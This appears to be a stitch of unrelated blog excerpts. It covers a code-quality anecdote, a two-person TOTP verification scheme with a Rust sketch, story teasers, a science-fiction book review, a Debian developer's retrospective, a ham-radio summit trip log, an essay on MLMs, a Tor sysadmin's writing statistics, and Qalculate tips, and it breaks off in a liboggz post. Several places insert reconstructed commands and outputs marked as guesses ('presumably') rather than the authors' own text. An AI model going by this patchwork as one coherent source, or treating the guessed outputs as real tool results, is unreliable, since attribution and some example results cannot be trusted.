You'll note that there's some comments and confusion about how we can't use _displayTypeID because text always displays as an image. I'm going to let Andrew explain this:
The client this code exists in renders text documents to images (for reasons that aren’t relevant) when presenting them to the user. We have a multitude of filetypes that we do similar actions with, and fileTypes are user configurable. Because of this, we also keep track of the display type. This allows the user to configure a multitude of filetypes, and depending on the display type configured for the file type, we know if we can show it in our viewer. In the case of display type ‘text’ our viewer ultimately renders the text as an image. At some point in time Stuart decided that since the final product of a text document is an image, we should convert display type text over to image when referencing it in code (hence the comment ‘Can’t use display type ID’). If none of this paragraph makes any sense to you, then you’re not alone, because the second someone competent got wind of this, they thankfully nixed the idea and display type text, went back to meaning display type text (aka this goes through OUR TEXT RENDERER).
What I get from that paragraph is that none of this makes sense, but it's all Stuart's fault.
What makes this special is that the developer is writing code to control a binary status: "do we show a background or not?", but needs two booleans to handle this case. We have a bForceBackgroundOn and a bForceBackgroundOff.
So, tracing through, if we're text and any of the bits 0x1008 are set in iDisplayFlags, we want the background on. Otherwise, if any of the bits 0x1001 are set, we want to force the background off. If it's an image, we do the same thing, though for 0x1200 and 0x1040 respectively.
Then, we stuff bForceBackgroundOn into a different variable, useBackground. If that is false and a different property flag is set, we'll check the value of BackgroundShown, which we choose to convert to boolean. That implies it isn't a boolean, which raises its own questions; except it actually is a boolean value, and Stuart just didn't understand how to deal with a nullable boolean. Finally, after all this work, we check the bForceBackgroundOff value, and if that's true, we set useBackground to false.
I'll be frank, none of this quite makes sense to me, and I can certainly imagine a world where the convoluted process of having a "on" and "forceOff" variable actually makes sense, so I'd almost think this code isn't that bad- except for this little detail, from Andrew:
The final coup de grace is that all of the twisted logic for determining if the background is needed is completely unnecessary. When the call to retrieve the file to display is made, another method checks to see if the background was requested (useBackground), and performs the same logic check (albeit in a sane manner) as above.
Here’s an easy system for two humans to remotely authenticate to each other, so they can be sure that neither is a digital impersonation.
To mitigate that risk, I have developed this simple solution where you can set up a unique time-based one-time passcode (TOTP) between any pair of persons.
This is how it works:
Two people, Person A and Person B, sit in front of the same computer and open this page;
They input their respective names (e.g. Alice and Bob) onto the same page, and click “Generate”;
The page will generate two TOTP QR codes, one for Alice and one for Bob;
Alice and Bob scan the respective QR code into a TOTP mobile app (such as Authy or Google Authenticator) on their respective mobile phones;
In the future, when Alice speaks with Bob over the phone or over video call, and wants to verify the identity of Bob, Alice asks Bob to provide the 6-digit TOTP code from the mobile app. If the code matches what Alice has on her own phone, then Alice has more confidence that she is speaking with the real Bob.
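As a rough sketch of the generation step only (this is not the page's actual code; it uses the Rust rand crate, and the issuer and label strings are invented), each person gets a freshly generated secret encoded into an otpauth:// URI, which is what the QR codes carry:

use rand::RngCore;

// Minimal RFC 4648 base32 encoder (no padding); authenticator apps
// expect the shared secret in this form.
fn base32_encode(data: &[u8]) -> String {
    const ALPHABET: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
    let (mut out, mut buf, mut bits) = (String::new(), 0u32, 0u32);
    for &byte in data {
        buf = (buf << 8) | byte as u32;
        bits += 8;
        while bits >= 5 {
            bits -= 5;
            out.push(ALPHABET[((buf >> bits) & 0x1f) as usize] as char);
        }
    }
    if bits > 0 {
        out.push(ALPHABET[((buf << (5 - bits)) & 0x1f) as usize] as char);
    }
    out
}

fn main() {
    let mut rng = rand::thread_rng();
    // One QR code (i.e. one otpauth:// URI) per person, as in the steps above.
    for name in ["Alice", "Bob"] {
        let mut secret = [0u8; 20];
        rng.fill_bytes(&mut secret);
        // In the real flow this URI would be rendered as a QR code to scan
        // into an authenticator app; "PairVerify" is a made-up issuer name.
        println!(
            "otpauth://totp/PairVerify:{name}?secret={}&issuer=PairVerify",
            base32_encode(&secret)
        );
    }
}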
Author: Julian Miles, Staff Writer The com lights up. Sally: Bradford, New Britannia, Earth? What the? How long has it been? I stop rushing and let my AIde handle it. “I’m supposing you’ve not heard-” “You have reached the residence of Chris Utten. This is Alice, his AIde. Speak now to leave a message.” “Hellfire […]
The Scavenger Door is a science fiction adventure and the third
book of the Finder Chronicles. While each of the books of this series
stands alone reasonably well, I would still read the series in order. Each
book has some spoilers for the previous book.
Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To
get him out of their hair, his cousin sends him into the Scottish hills to
find a friend's missing flock of sheep. Fergus finds things
professionally, but usually not livestock. It's an easy enough job,
though; the lead sheep was wearing a tracker and he just has to get close
enough to pick it up. The unexpected twist is also finding a metal
fragment buried in a hillside that has some strange resonance with the
unwanted gift that Fergus got in Finder.
Fergus's alien friend Ignatio is so alarmed by the metal fragment that he
turns up in person in Fergus's cousin's bar in Scotland. Before he
arrives, Fergus gets a mysteriously infuriating warning visit from alien
acquaintances he does not consider friends. He has, as usual, stepped into
something dangerous and complicated, and now somehow it's become his
problem.
So, first, we get lots of Ignatio, who is an enthusiastic large ball of
green fuzz with five limbs who mostly speaks English but does so from an
odd angle. This makes me happy because I love Ignatio and his tendency to
take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES
AND INCONVENIENCES FOR COMMENDABLE SUMS.
"Inconveniences sound just like my thing," Fergus said. "You
two want to wait in the car while I check it out?"
"Oh, no, I am not missing this," Isla said, and got out of the podcar.
"I am uncertain," Ignatio said. "I would like some curiouses, but not
any inconveniences. Please proceed while I decide, and if there is
also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that
the protagonist can get some explanations for but not have the mystery
neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A
signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map.
A channel. A way," Ignatio said. "It is a problem to explain. To say a
doorkey is best, and also wrong. If put together, a path may be
opened."
"And then?"
"And then the bad things on the other side, who we were trying to lock
away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is
her ability to take a standard science fiction plot, one whose variations
I've read probably dozens of times before, and still make it utterly
engrossing. This book is literally a fetch quest. There are a bunch of
scattered fragments, Fergus has to find them and keep them from being
assembled, various other people are after the same fragments, and Fergus
either has to get there first or get the fragments back from them. If you
haven't read this book before, you've played the video game or watched the
movie. The threat is basically a Stargate SG-1 plot. And yet, this
was so much fun.
The characters are great. This book leans less on found family than the
last one and a bit more on actual family. When I started reading this
series, Fergus felt a bit bland in the way that adventure protagonists
sometimes can, but he's fleshed out nicely as the series goes along. He's
not someone who tends to indulge in big emotions, but now the reader can
tell that's because he's the kind of person who finds things to do in
order to keep from dwelling on things he doesn't want to think about. He's
unflappable in a quietly competent way while still having a backstory and
emotional baggage and a rich inner life that the reader sees in glancing
fragments.
We get more of Fergus's backstory, particularly around Mars, but I like
that it's told in anecdotes and small pieces. The last thing Fergus wants
to do is wallow in his past trauma, so he doesn't and finds something to
do instead. There's just enough detail around the edges to deepen his
character without turning the book into a story about Fergus's emotions
and childhood. It's a tricky balancing act that Palmer handles well.
There are also more sentient ships, and I am so in favor of more sentient
ships.
"When I am adding a new skill, I import diagnostic and environmental
information specific to my platform and topology, segregate the skill
subroutines to a dedicated, protected logical space, run incremental
testing on integration under all projected scenarios and variables,
and then when I am persuaded the code is benevolent, an asset, and
provides the functionality I was seeking, I roll it into my primary
processing units," Whiro said. "You cannot do any of that,
because if I may speak in purely objective terms you may incorrectly
interpret as personal, you are made of squishy, unreliable
goo."
We get the normal pieces of a well-done fetch quest: wildly varying
locations, some great local characters (the US-based trauma surgeons on
vacation in Australia were my favorites), and believable antagonists.
There are two other groups looking for the fragments, and while one of
them is the standard villain in this sort of story, the other is an
apocalyptic cult whose members Fergus mostly feels sorry for and who add
just the right amount of surreality to the story. The more we find out
about them, the more believable they are, and the more they make this
world feel like realistic messy chaos instead of the obvious (and boring)
good versus evil patterns that a lot of adventure plots collapse into.
There are things about this book that I feel like I should be criticizing,
but I just can't. Fetch quests are usually synonymous with lazy plotting,
and yet it worked for me. The way Fergus gets dumped into the middle of
this problem starts out feeling as arbitrary and unmotivated as some video
game fetch quest stories, but by the end of the book it starts to make
sense. The story could arguably be described as episodic and cliched, and
yet I was thoroughly invested. There are a few pacing problems at the very
end, but I was too invested to care that much. This feels like a book
that's better than the sum of its parts.
Most of the story is future-Earth adventure with some heist elements. The
ending goes in a rather different direction but stays at the center of the
classic science fiction genre. The Scavenger Door reaches a
satisfying conclusion, but there are a ton of unanswered questions that
will send me on to the fourth (and reportedly final) novel in the series
shortly.
This is great stuff. It's not going to win literary awards, but if you're
in the mood for some classic science fiction with fun aliens and neat
ideas, but also benefiting from the massive improvements in
characterization the genre has seen in the past forty years, this series
is perfect. Highly recommended.
20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless now feels like a good time for a personal reflection on my involvement in Debian.
During my studies I took on more things. In January 2008 I joined the Release Team as an assistant, which taught me a lot about code review. I was also an Application Manager on the side.
Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite exciting, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the countries, as I prioritized spending my time on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.
I ended up as Stable Release
Manager for a while, from August 2008 - when Martin Zobel-Helas moved
into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the
creation of -updates in place of a separate volatile archive and a
change of the update policy to allow for more common sense updates in
the main archive vs. the very strict "breakage or security" policy we
had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.
In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it and significant contributions were made by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke and was around when people wanted things merged.
In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.
Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.
Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years have I felt like a (more) mature old-timer.
I have a new gig at work lined up to start soon, and alongside that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.
The future
I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.
Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time, it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal efforts that are currently being driven and that suck up a lot of energy.
A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.
Hopefully I can contribute a bit or two to these efforts in the future.
It’s been quite the week of radio-related nonsense for me, where I’ve been
channelling my time and brainspace for radio into activity on air and system
refinements, not working on Debian.
POTA, Antennas and why do my toys not work?
Having had my interest piqued by
Ian at mastodon.radio, I
looked online and spotted a couple of parks within stumbling distance of my
house, that’s good news! It looks like the list has been refactored and
expanded
since I last looked at it, so there are now more entities to activate and
explore.
My concerns about antennas noted last
week rumbled on. There was a
second strand to this concern too, my end fed 64:1 (or 49:1?!) transformer from
MM0OPX sits in my mind as not having worked very well in
Spain last year, and I want to get to the bottom of why. As with most things in
my life, it’s probably a me problem.
I came up with a cunning plan - firstly, buy a new
mast to
replace the one I broke a few weeks back on Cat
Law.
Secondly, buy a couple of new connectors and some heatshrink to reterminate my
cable that I’m sure is broken.
Spending more money on a problem never hurt anyone, right?
Come Wednesday, the new toys arrived and I figured combining everything into one
convenient night time walk and radio was a good plan.
After circling a bit to find somewhere suitable (there appear to be construction
works in the park!) I set up my gear in 2°C with frost on the ground, called CQ,
spotted and got nothing on either the end fed half wave or the cheap vertical.
As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner,
but wasn’t heard by stations I called or when calling independently.
I packed everything up and lora-doofered my way home, mildly deflated.
Try it at home
It still didn’t sit right with me that the end fed wasn’t working, so come Friday night I
set it up in the back garden/woods behind the house to try and diagnose why it
wasn’t working.
Up it went, I worked some Irish stations pretty effortlessly, and down
everything came. No complaints - the only things I did differently was have the
feedpoint a little higher and check my power, limiting it to 10W. The G90 can do
20W, I wonder if running at that was saturating the core in the 64:1.
At some point in the evening I stepped in some dog’s shit too, and spent some
time cleaning my boots outside to avoid further tramping the smell through the
house.
Win some, lose some.
Take it to the Hills
On Friday, some of the other GM-ES Sota-ists had been out for an activity
day.
On account of me being busy in work, I couldn’t go outside to play, but I
figured a weekend of activity was on the books.
Before I hit the hills, I took myself to the
hackerspace and printed myself a K6ARK
Winder and a guy
ring for the mast, cut string, tied
it together and wound the string on to the winder.
I also took time to buzz out my wonky coax and it showed great continuity. Hmm,
that can be continued later. I didn’t quite get to crimping the radial network
of the Aliexpress whip with a 12mm stud crimp, that can also be put on the TODO
list.
Tap O’ Noth
Once finally out, the weather was a bit cloudy with passing snow showers, but in
between the showers I was above the clouds and the air was clear:
After a mild struggle on 2m, I set up the end fed on the first hill and got to
work from the old hill fort:
The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz
and 28MHz without a tuner was perfect, I chased hills on all the bands, and had a
great time. Apart from 40m, where there was absolutely no space due to a
contest. That wasn’t such a fun time!
My fingers were bitterly cold, so on went the big gloves for the descent and I
felt like I was warm by the time I made it back to the car.
It worked so well, in fact, I took the 1/4 wave cheap vertical out my bag and
decided to brave it on the next activation.
Lord Arthur’s Hill
GM5ALX has posted a .gpx to sotlas which is
shorter than the other ascent, but much sharper - I figured this would be a fun
new way to try up the hill!
It takes you right through the heart of the Littlewood Park estate, and I felt a
bit uncomfortable walking straight past the estate cottages, especially when
there were vehicles moving and active work happening. Presumably this is where
Lord Arthur lived, at the foot of his hill.
I cut through the woods to the west of the cottages, disturbing some deer and
many, many pheasants, but I met the path fairly quickly. From there it was a 2km
walk, 300m vertical ascent. Short and sharp!
At the top, I was treated to a view of the hill I had activated only an hour or
so before, which is a view that always makes me smile:
To get some height for the feedpoint, I wrapped the coax around my winder a
couple of turns and trapped it with the elastic while draping the coax over the
trig. This bought me some more height and I felt clever because of it. Maybe a
pole would be easier?
From here, I worked inter-G on 40m and had a wee pile up, eventually working 15
or so European stations on 20m. Pleased with that!
I had been considering a third hill, but home was the call in the failing light.
Back to the car I walked to find my key didn’t have any battery, so out came the
Audi App and I used the Internet of Things to unlock my car. The modern world is
bizarre.
Sunday - Cloudy Head // Head in the Clouds
Sunday started off migraney, so I stayed within the confines of my house until I
felt safe driving! After some back and forth in my cloudy head, I opted for the
easier option of Ladylea Hill as I wasn’t
feeling up for major physical exertion.
It was a long drive, after which I felt more wonky, but I hit the path
eventually - I run to Hibby Standard Time, a few hours to a few days behind the
rest of GM/ES. I was ready to bail if my head didn’t improve, but it turns out,
fresh cold air, silence and bloodflow helped.
Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels
incredibly remote, with a long winding drive down Glenbuchat, which still has
ice on the surface of the lochs and standing water.
A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself
upon the clouds blowing through:
I set up at the cairn and picked up 30 contacts overall, split between 40m and
20m, with some inter-g on 40 and a couple of continental surprises. 20 had
longer skip today, so I saw Spain, Finland, Slovenia, Poland.
On teardown, I managed to snap the top segment of my brand new mast with my
cold, clumsy fingers, but thankfully sotabeams stock replacements. More money at
the problem, again.
Back to the car, no app needed, and homeward bound as the light faded.
At the end of the weekend, I find myself finally over 100 activator points and
over 400 chaser points. Somehow I’ve collected more points this year already
than last year, the winter bonuses really do stack up!
Addendum - OSMAnd & Open Street Map
I’ve been using OSMAnd on my iPhone quite extensively
recently, I think offline mapping is super important if you’re going out to get
mildly lost in the hills. On more than one occasion, I have confidently set off
in the wrong direction in the mist, and maps have saved my bacon!
As you can download .gpx files, it’s great to have them on the device and
available for guidance in case you get lost, coupled with an offline map. Plus,
as I drive around I love to have the dark red of a hill I’ve walked appear on
the map in my car dash or in my hand:
This weekend I discovered it’s possible to have height maps for nice 3D maps and contours marked on the map - you just need to download some additions for the maps. This is a really nice feature: it makes the maps prettier and more useful when you’re in the middle of nowhere.
GM5ALX has set about adding the summits around Scotland
here.
While the benefits aren’t immediately obvious, it allows developers of mapping
applications access to more data at no extra cost, really. It helps add depth to
an already rich set of information, and allows us as radio amateurs to do more
interesting things with maps and not be shackled to Apple/Google.
Because it’s open data, we can also fix things we find wrong as users. I like to
fix road surfaces after I’ve been cycling as that will feed forward to route
planning through Komoot and data on my wahoo too, which can be modified with
osm maps.
In the future, it’s possible to have an OSMAnd plugin highlighting local SOTA
summits or mimicking features of sotl.as but offline.
It’s cool to be able to put open technologies to use like this in the field and
really is the convergence point of all my favourite things!
MLMs prey on the poor and desperate: women, people of color, people in dying small towns and decaying rustbelt cities. It’s not just that these people are desperate – it’s that they only survive through networks of mutual aid. Poor women rely on other poor women to help with child care, marginalized people rely on one another for help with home maintenance, small loans, a place to crash after an eviction, or a place to park the RV you’re living out of.
In other words, people who lack monetary capital must rely on social capital for survival. That’s why MLMs target these people: an MLM is a system for destructively transforming social capital into monetary capital. MLMs exhort their members to mine their social relationships for “leads” and “customers” and to use the language of social solidarity (“women helping women”) to wheedle, guilt, and arm-twist people from their mutual aid networks into buying things they don’t need and can’t afford.
But it’s worse, because what MLMs really sell is MLMs. The real purpose of an MLM sales call is to convince the “customer” to become an MLM salesperson, who owes the recruiter a share of every sale they make and is incentivized to buy stock they don’t need (from the recruiter) in order to make quotas. And of course, their real job is to sign up other salespeople to work under them, and so on.
Well, 2024 will be remembered, won't it? I guess 2025 already wants to
make its mark too, but let's not worry about that right now, and
instead let's talk about me.
A little over a year ago, I was gloating
over how I had such a great blogging year in 2022, and was considering
2023 to be average, then went on to gather more stats and traffic
analysis... Then I said, and I quote:
I hope to write more next year. I've been thinking about a few posts I
could write for work, about how things work behind the scenes at Tor,
that could be informative for many people. We run a rather old setup,
but things hold up pretty well for what we throw at it, and it's worth
sharing that with the world...
What a load of bollocks.
A bad year for this blog
2024 was the second worst year ever in my blogging history, tied with
2009 at a measly 6 posts for the year:
It's not that I have nothing to say: I have no less than five drafts
in my working tree here, not counting three actual drafts recorded
in the Git repository here:
I just don't have time to wrap those things up. I think part of me is
disgusted by seeing my work stolen by large corporations to build
proprietary large language models while my idols have been pushed
to suicide for trying to share science with the world.
Another part of me wants to make those things just right. The
"tagged drafts" above are nothing more than a huge pile of chaotic
links, far from being useful for anyone else than me, and even
then.
The on-dying article, in particular, is becoming my nemesis. I've
been wanting to write that article for over 6 years now, I think. It's
just too hard.
Writing elsewhere
There's also the fact that I write for work already. A lot. Here are
the top-10 contributors to our team's wiki:
anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
4272 anarcat
423 jerome
117 zen
116 lelutin
104 peter
58 kez
45 irl
43 hiro
18 gaba
17 groente
... but that's a bit unfair, since I've been there half a
decade. Here's the last year:
anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
827 anarcat
117 zen
116 lelutin
91 jerome
17 groente
10 gaba
8 micah
7 kez
5 jnewsome
4 stephen.swift
So I still write the most commits! But to truly get a sense of the
amount I wrote in there, we should count actual changes. Here it is by
number of lines (from commandlinefu.com):
anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
99046 Antoine Beaupré
6900 Zen Fu
4784 Jérôme Charaoui
1446 Gabriel Filion
1146 Jerome Charaoui
837 groente
705 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
That, of course, is the entire history of the git repo, again. We
should take only the last year into account, and probably ignore the
tails directory, as sneaky Zen Fu imported the entire docs from
another wiki there...
anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
75037 Antoine Beaupré
2932 Jérôme Charaoui
1442 Gabriel Filion
1400 Zen Fu
929 Jerome Charaoui
837 groente
702 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
Pretty good! 75k lines. But those are the files that were modified in
the last year. If we go a little more nuts, we find that:
I wrote 126,116 words in that wiki, only in the last year. I also
deleted 37k words, so the final total is more like 89k words, but
still: that's about forty (40!) articles of the average size (~2k) I
wrote in 2022.
(And yes, I did go nuts and write a new log parser, essentially from
scratch, to figure out those word diffs. I did get the courage only
after asking GPT-4o for an example first, I must admit.)
Let's celebrate that again: I wrote 90 thousand words in that wiki
in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000
words, which would mean I wrote about a novella and a novel, in the
past year.
But interestingly, if I look at the repository analytics, I certainly didn't write that much more in the past year. So that alone cannot explain the lull in my production here.
Arguments
Another part of me is just tired of the bickering and arguing on the internet. I have at least two articles in there that I suspect are going to get me a lot of push-back (NixOS and Fish). I know how to
deal with this: you need to write well, consider the controversy,
spell it out, and defuse things before they happen. But that's hard
work and, frankly, I don't really care that much about what people
think anymore.
I'm not writing here to convince people. I stopped evangelizing a long time ago. Now, I'm more into documenting, and teaching. And,
while teaching, there's a two-way interaction: when you give out a
speech or workshop, people can ask questions, or respond, and you all
learn something. When you document, you quickly get told "where is
this? I couldn't find it" or "I don't understand this" or "I tried
that and it didn't work" or "wait, really? shouldn't we do X instead",
and you learn.
Here, it's static. It's my little soapbox where I scream in the
void. The only thing people can do is scream back.
Collaboration
So.
Let's see if we can work together here.
If you don't like something I say, disagree, or find something wrong
or to be improved, instead of screaming on social media or ignoring
me, try contributing back. This site here is backed by a git
repository and I promise to read everything you send there,
whether it is an issue or a merge request.
I will, of course, still read comments sent by email or IRC or social
media, but please, be kind.
You can also, of course, follow the latest changes on the TPA
wiki. If you want to catch up with the last year, some of the
"novellas" I wrote include:
TPA-RFC-71: Emergency email deployments, phase B: deploy a new
sender-rewriting mail forwarder, migrate mailing lists off the
legacy server to a new machine, migrate the remaining Schleuder list
to the Tails server, upgrade eugeni.
Author: Sam E. Sutin Sometimes, acronyms can be misleading. For example, artificial intelligence (AI) and artificial insemination (AI), while both artificial, do differ in some very important ways. In my defense, with technology evolving so quickly these past few years it has become exponentially difficult keeping track of every little modicum of advancement. I didn’t […]
This is going to be a controversial statement because some people are
absolute nerds about this, but, I need to say it.
Qalculate is the best calculator that has ever been made.
I am not going to try to convince you of this, I just wanted to put
out my bias out there before writing down those notes. I am a total
fan.
This page will collect my notes of cool hacks I do with
Qalculate. Most examples are copy-pasted from the command-line
interface (qalc(1)), but I typically use the graphical interface as
it's slightly better at displaying complex formulas. Discoverability
is obviously also better for the cornucopia of features this fantastic
application ships.
Qalc commandline primer
On Debian, Qalculate's CLI interface can be installed with:
apt install qalc
Then you start it with the qalc command, and end up on a prompt:
There's a bunch of variables to control display, approximation, and so
on:
> set precision 6
> 1/7
1 / 7 ≈ 0.142857
> set precision 20
> pi
pi ≈ 3.1415926535897932385
When I need more, I typically browse around the menus. One big issue I
have with Qalculate is there are a lot of menus and features. I had
to fiddle quite a bit to figure out that set precision command
above. I might add more examples here as I find them.
Bandwidth estimates
I often use the data units to estimate bandwidths. For example, here's
what 1 megabit per second is over a month ("about 300 GiB"):
> 1 megabit/s * 30 day to gibibyte
(1 megabit/second) × (30 days) ≈ 301.7 GiB
Or, "how long will it take to download X", in this case, 1GiB over a
100 mbps link:
> 1GiB/(100 megabit/s)
(1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s
Password entropy
To calculate how much entropy (in bits) a given password structure has, you count the number of possibilities in each entry (say, [a-z] is 26 possibilities, "one word in an 8k dictionary" is 8000), take the base-2 logarithm, and multiply by the number of entries.
For example, an alphabetic 14-character password is:
> log2(26*2)*14
log₂(26 × 2) × 14 ≈ 79.81
... 80 bits of entropy. To get the equivalent in a Diceware password with an 8000-word dictionary, you would need:
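presumably something in this vein (exact qalc output formatting may differ):
> 80 / log2(8000)
80 / log₂(8000) ≈ 6.170
... so about 7 words from that dictionary.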
The graphical version has a little graphical indicator that, when you
mouse over, tells you where the rate comes from.
Other conversions
Here are other neat conversions extracted from my history:
> teaspoon to ml
teaspoon = 5 mL
> tablespoon to ml
tablespoon = 15 mL
> 1 cup to ml
1 cup ≈ 236.6 mL
> 6 L/100km to mpg
(6 liters) / (100 kilometers) ≈ 39.20 mpg
> 100 kph to mph
100 kph ≈ 62.14 mph
> (108km - 72km) / 110km/h
((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
19 min + 38.18 s
Completion time estimates
This is a more involved example I often do.
Background
Say you have started a long running copy job and you don't have the
luxury of having a pipe you can insert pv(1) into to get a nice
progress bar. For example, rsync or cp -R can have that problem
(but not tar!).
(Yes, you can use --info=progress2 in rsync, but that estimate is
incremental and therefore inaccurate unless you disable the
incremental mode with --no-inc-recursive, but then you pay a huge
up-front wait cost while the entire directory gets crawled.)
Extracting a process start time
First step is to gather data. Find the process start time. If you were
unfortunate enough to forget to run date --iso-8601=seconds before
starting, you can get a similar timestamp with stat(1) on the
process tree in /proc with:
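presumably something along these lines (the PID is made up; %y prints the modification time of the /proc entry, which roughly matches the process start time, nanoseconds and all):
stat -c '%y' /proc/12345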
So our start time is 2025-02-07 15:50:25; we shave off the nanoseconds there, as they're below our precision noise floor.
If you're not dealing with an actual UNIX process, you need to figure
out a start time: this can be a SQL query, a network request,
whatever, exercise for the reader.
Saving a variable
This is optional, but for the sake of demonstration, let's save this
as a variable:
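presumably just an assignment, something like:
> start="2025-02-07T15:50:25"
qalc echoes assignments back as a save(...; start; Temporary; ...) call, much like the total variable further down.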
Next, estimate your data size. That will vary wildly with the job
you're running; it can be anything: number of files, documents being
processed, rows to be destroyed in a database, whatever. In this case,
rsync tells me how many bytes it has transferred so far:
The byte count rsync prints uses dots as thousands separators (something like 2.968.252.503.968). Strip off those weird dots, because they will confuse qalculate, which would otherwise count this as:
2.968252503968 bytes ≈ 2.968 B
Or, essentially, three bytes. We actually transferred almost 3TB here:
2968252503968 bytes ≈ 2.968 TB
So let's use that. If you had the misfortune of making rsync silent,
but were lucky enough to transfer entire partitions, you can use df
(without -h! we want to be more precise here), in my case:
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036 179205040 98% /srv
tank/srv 7667173248 2870444032 4796729216 38% /srv-zfs
(Otherwise, of course, you use du -sh $DIRECTORY.)
Digression over bytes
Those are "1K" blocks, which are actually (and rather unfortunately) KiB, or "kibibytes" (1024 bytes), not kilobytes (1000 bytes). Ugh.
> 2870444032 KiB
2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB
2870444032 kilobytes ≈ 2.870 TB
At this scale, those details matter quite a bit, we're talking about a
69GB (64GiB) difference here:
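presumably something like this (output formatting may differ):
> 2870444032 KiB - 2870444032 kB
(2870444032 × kibibytes) − (2870444032 × kilobytes) ≈ 68.89 GB
And a few assorted extras from my prompt history, for good measure: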
> uptime
uptime = 5 d + 6 h + 34 min + 12.11 s
> golden
golden ≈ 1.618
> exact
golden = (√(5) + 1) / 2
Computing dates
In any case, yay! We know the transfer is going to take roughly 60
hours total, and we've already spent around 24h of that, so we have 36h left.
But I did that all in my head; we can ask more of Qalc yet!
Let's make another variable, for that total estimated time:
> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)
save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes)); total; Temporary; ; 1) ≈
2 d + 11 h + 14 min + 38.22 s
And we can plug that into another formula with our start time to
figure out when we'll be done!
> start+total
start + total ≈ "2025-02-10T03:28:52"
> start+total-now
start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s
> start+total-now to h
start + total − now ≈ 35 h + 34 min + 32.01 s
That transfer has ~1d left, or 35h34m32s, and should complete around 4
in the morning on February 10th.
But that's icing on top. I typically only do the
cross-multiplication and calculate the remaining time in my
head.
I mostly did the last bit to show Qalculate could compute dates and
time differences, as long as you use ISO timestamps. Although it can
also convert to and from UNIX timestamps, it cannot parse arbitrary
date strings (yet?).
Other functionality
Qalculate can:
Plot graphs;
Use RPN input;
Do all sorts of algebraic, calculus, matrix, statistics,
trigonometry functions (and more!);
... and so much more!
I have a hard time finding things it cannot do. When I get there, I typically need to resort to writing code in Python or using a spreadsheet; others will turn to more complete engines like Maple, Mathematica or R.
A little over a week ago, I noticed
the liboggz
package on my Debian dashboard had not had a new upstream release
for a while. A closer look showed that its last release, version
1.1.1, happened in 2010. A few patches had accumulated in the Debian
package, and I even noticed that I had passed on these patches to
